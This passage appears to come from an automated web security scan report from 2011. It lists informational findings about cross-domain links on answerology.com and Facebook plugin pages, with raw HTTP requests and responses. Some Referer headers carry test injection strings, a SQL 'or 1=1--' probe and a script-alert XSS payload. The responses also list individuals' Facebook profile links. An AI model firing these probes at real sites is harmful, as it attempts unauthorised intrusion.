Cookie: __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; __utmv=191590138.null%3Alogged%20out; __utmb=191590138; rsi_segs=; s_cc=true; neworold=8; s_lastvisit=1316295024089; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_nr=1316295025109; hm_neworold=New; s_pv=Answerology%3A%20error; s_ppv=0; s_sq=hmagglobal%2Chmaganswerology%3D%2526pid%253DAnswerology%25253A%252520error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.answerology.com/index.aspx%25253Ftemplate%25253Dabout_our_ads.ascx%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:22 GMT
Content-Length: 11038
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>About Our Ads - Ask and answer questions anonymously on any topic.</title>
<meta
...[SNIP]...
nts about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, please visit <a href="http://networkadvertising.org/consumer/opt_out.asp" target="_blank">http://networkadvertising.org/consumer/opt_out.asp</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...
</script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F09828&auto=t"></script>
...[SNIP]...
18.144. http://www.answerology.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.aspx?template=ads.ascx&topic=other&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:11 GMT
Content-Length: 1009
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html>
<body width="728" height="90" style="margin:0;text-align:center;text-valign:center;" >
<script type="text/javascript">
var segQS = parent.segQS;
</script>
<!-- begin 728x90 ad tag (tile=1)
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/hdm.answerology/;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/hdm.answerology/;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
18.145. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.6.31
X-Cnection: close
Date: Sat, 17 Sep 2011 16:30:15 GMT
Content-Length: 14238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="TDBf";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7395c2f0efdc868f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Best Movie Ever: Scarface" href="http://www.ugo.com/dvd/best-movie-ever-scarface" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCXDw9kolADUScW&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201108%2F8%2F2%2F0%2F207028%2Fcuts%2Ftitle_72x72.png" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/dvd/best-movie-ever-scarface" target="_blank">Best Movie Ever: Scarface</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_77e8e39df0822a4d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The Angriest Men On Film" href="http://www.ugo.com/movies/the-angriest-men-on-film" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCZOUqLxVS9KxbC&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201102%2F7%2F2%2F2%2F175227%2Fcuts%2Fthe-incredible-hulk_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/the-angriest-men-on-film" target="_blank">The Angriest Men On Film</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_138c8aa7e17cdd58"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Jamie King at the X-Men: First Class Blu-ray/DVD Party" href="http://www.ugo.com/therush/jamie-king-in-orange" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQC2BCmxSJAyXo8Z&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F2%2F3%2F1%2F208132%2Fcuts%2Fmain_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/therush/jamie-king-in-orange" target="_blank">Jamie King at the X-Men: First Class Blu-ray/DVD Party</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_312dfb21f4a0626b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Killer Elite Gears of War 3 &amp; Xbox 360 Giveaway" href="http://www.ugo.com/movies/killer-elite-gears-of-war-3-xbox-360-giveaway" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAwPWF7uXZwA93Z&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F5%2F1%2F0%2F208015%2Fcuts%2Fkiller-elite-movie-poster_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/killer-elite-gears-of-war-3-xbox-360-giveaway" target="_blank">Killer Elite Gears of War 3 &amp; Xbox 360 Giveaway</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_8d10d73088d3606"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Worst Of It&#039;s Always Sunny In Philadelphia" href="http://www.ugo.com/tv/the-worst-of-its-always-sunny-in-philadelphia" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQA0Joq77Rj0_j1h&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F6%2F7%2F4%2F208476%2Fcuts%2Fugo-sunny_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/tv/the-worst-of-its-always-sunny-in-philadelphia" target="_blank">Worst Of It&#039;s Always Sunny In Philadelphia</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_170e93cfb72308bd"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Twilight Breaking Dawn Interpretations" href="http://www.ugo.com/movies/twilight-breaking-dawn-trailer-interpretations" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCjT5YgPgTU-7gD&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F7%2F8%2F5%2F208587%2Fcuts%2Fbreaking-dawn_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/twilight-breaking-dawn-trailer-interpretations" target="_blank">Twilight Breaking Dawn Interpretations</a>
...[SNIP]...
18.146. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.33.113
X-Cnection: close
Date: Sat, 17 Sep 2011 16:43:08 GMT
Content-Length: 14199

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="3uj4";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_dd51a9bde764644"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Citizen Kane - Best Movie Ever" href="http://www.ugo.com/movies/best-movie-ever-citizen-kane" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCsEyiAVgOHOrhT&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F6%2F8%2F1%2F208186%2Fcuts%2Fkane_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/best-movie-ever-citizen-kane" target="_blank">Citizen Kane - Best Movie Ever</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7826b0c576f29c7"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The Angriest Men On Film" href="http://www.ugo.com/movies/the-angriest-men-on-film" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCZOUqLxVS9KxbC&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201102%2F7%2F2%2F2%2F175227%2Fcuts%2Fthe-incredible-hulk_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/the-angriest-men-on-film" target="_blank">The Angriest Men On Film</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_63e602364691ded2"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Jamie King at the X-Men: First Class Blu-ray/DVD Party" href="http://www.ugo.com/therush/jamie-king-in-orange" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQC2BCmxSJAyXo8Z&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F2%2F3%2F1%2F208132%2Fcuts%2Fmain_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/therush/jamie-king-in-orange" target="_blank">Jamie King at the X-Men: First Class Blu-ray/DVD Party</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_414773b0534d61e1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Killer Elite Gears of War 3 &amp; Xbox 360 Giveaway" href="http://www.ugo.com/movies/killer-elite-gears-of-war-3-xbox-360-giveaway" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAwPWF7uXZwA93Z&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F5%2F1%2F0%2F208015%2Fcuts%2Fkiller-elite-movie-poster_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/killer-elite-gears-of-war-3-xbox-360-giveaway" target="_blank">Killer Elite Gears of War 3 &amp; Xbox 360 Giveaway</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_67641b5e10ce0b37"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Twilight Breaking Dawn Interpretations" href="http://www.ugo.com/movies/twilight-breaking-dawn-trailer-interpretations" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCjT5YgPgTU-7gD&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F7%2F8%2F5%2F208587%2Fcuts%2Fbreaking-dawn_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/movies/twilight-breaking-dawn-trailer-interpretations" target="_blank">Twilight Breaking Dawn Interpretations</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_78bb85e2af60358c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Worst Of It&#039;s Always Sunny In Philadelphia" href="http://www.ugo.com/tv/the-worst-of-its-always-sunny-in-philadelphia" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQA0Joq77Rj0_j1h&amp;url=http%3A%2F%2Fmimg.ugo.com%2F201109%2F6%2F7%2F4%2F208476%2Fcuts%2Fugo-sunny_72x72.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.ugo.com/tv/the-worst-of-its-always-sunny-in-philadelphia" target="_blank">Worst Of It&#039;s Always Sunny In Philadelphia</a>
...[SNIP]...
18.147. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.126.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:46 GMT
Content-Length: 12041

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ellegirlcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195791_31818566964_586378_q.jpg" alt="ELLEgirl.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260932_100001251454950_866047_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/akber.rider" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260962_100001031614302_1352206823_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001639104712" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/273246_100000183238371_1934881_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002170420953" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274221_100002170420953_96917597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1025252067" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276380_1025252067_6621096_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1525705558" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274286_1525705558_987951046_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/belciz.gurcam" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275818_1284006413_1175885299_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001108186149" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27351_100001108186149_5613_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/herve.pierret" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195310_1228119088_7937752_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.148. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.233.57
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:39 GMT
Content-Length: 11901

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ellegirlcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195791_31818566964_586378_q.jpg" alt="ELLEgirl.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275857_100001527408802_1622502263_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002170420953" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274221_100002170420953_96917597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/herve.pierret" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195310_1228119088_7937752_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lululai08" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275123_1347765398_4701879_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/273246_100000183238371_1934881_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1525705558" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274286_1525705558_987951046_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001108186149" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27351_100001108186149_5613_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001639104712" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1025252067" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276380_1025252067_6621096_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000582854763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276081_100000582854763_3807958_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.149. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.21.64
X-Cnection: close
Date: Sat, 17 Sep 2011 16:51:42 GMT
Content-Length: 11972

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/qmyjguD9K67.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
